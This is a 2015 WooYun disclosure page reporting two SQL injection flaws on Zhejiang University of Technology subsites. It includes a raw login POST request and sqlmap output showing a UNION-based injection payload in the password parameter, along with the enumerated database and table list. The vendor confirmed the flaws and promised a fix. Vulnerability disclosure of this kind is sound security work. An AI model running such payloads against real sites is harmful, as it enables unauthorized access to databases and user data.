当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152557

漏洞标题:浙江工业大学分站两处sql注入漏洞打包

相关厂商:zjut.edu.cn

漏洞作者: 路人甲

提交时间:2015-11-09 18:48

修复时间:2015-12-26 15:18

公开时间:2015-12-26 15:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开

简要描述:

详细说明:

http://www.qks.zjut.edu.cn/ShowSinglePageAction.do?singlepageID=35

22.png

33.png

漏洞证明:

POST /wescms/index.php HTTP/1.1
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
Referer: http://www.materials.zjut.edu.cn
Cookie: PHPSESSID=60r023n4cfig3pk3d4u7qtt1n7
Host: www.materials.zjut.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
cmd=login&password=111111&postflag=1&username=blphlcit

41.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 30 columns
    Payload: cmd=login&password=111111') UNION ALL SELECT CONCAT(0x716b6b7a71,0x504347597056594c4757,0x7171767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &postflag=1&username=blphlcit
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: materials_zjut
[62 tables]
+-------------------------+
| adodbseq                |
| member                  |
| member_group            |
| member_profile          |
| poll_config             |
| poll_log                |
| poll_option             |
| poll_poll               |
| tbladvertisement        |
| tblarticle              |
| tblarticle_remark       |
| tblauditflow            |
| tblauditflow_status     |
| tblauditflow_step       |
| tblclass_template       |
| tblcolumns              |
| tblcounter              |
| tblcounter_daily        |
| tblcounter_online       |
| tblcp_class             |
| tblcp_class_field       |
| tblcp_class_relation    |
| tblcp_class_validator   |
| tblcp_constraint        |
| tblcp_constraint_bind   |
| tblcp_datatype          |
| tblcp_datatype_item     |
| tblcp_domain_validator  |
| tblcrons                |
| tblcustom_form          |
| tblcustom_form_bind     |
| tblcustom_form_cc       |
| tblcustom_form_field    |
| tblcustom_form_tab      |
| tblcustomise            |
| tbldashboard            |
| tbldashboard_plugins    |
| tbldistrictprivilege    |
| tblevent                |
| tblgroup                |
| tblguestbook            |
| tblguestbook_hf         |
| tblkeywords             |
| tbllink                 |
| tbllogin                |
| tbllogs                 |
| tblobject_attachment    |
| tblobject_counter       |
| tblobject_keywords      |
| tblobject_note          |
| tblobject_propertysheet |
| tblpersistent           |
| tblprivilege            |
| tblprivilege_atoms      |
| tblprofile_fields       |
| tblroom_arrangement     |
| tblroom_datesector      |
| tblroom_rooms           |
| tblsubject              |
| tblsubjectarticle       |
| tbluser_preference      |
| tblusergroup            |
+-------------------------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-11-11 15:17

厂商回复:

谢谢你的帮助,我们会尽快处理的

最新状态:

暂无